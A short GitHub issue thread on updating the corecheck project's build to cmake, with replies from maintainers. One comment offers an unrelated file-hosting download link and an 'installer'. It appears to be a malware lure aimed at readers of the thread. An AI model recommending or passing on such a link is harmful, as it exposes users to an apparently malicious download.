### ISSUE TITLE
Update for cmake

### ISSUE THREAD

**Issue by maflcko** [corecheck/corecheck#10]
Now that the autotools build system has been removed, it would be nice to update corecheck to cmake.

(Happy to do it myself, but it looks like the source code isn't public?)

**Comment by Shadi201711** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by aureleoules** [comment]
Yes the workers are open-source and located in this folder: https://github.com/corecheck/corecheck/tree/master/workers

I won't have time to refactor it in the coming weeks so if you can do it that would be great!

**Comment by m3dwards** [comment]
I believe this is working now for coverage, benchmarks and sonar.

Example: https://corecheck.dev/bitcoin/bitcoin/pulls/30956

Doe this look good? Is there anything else that needs to be looked at?
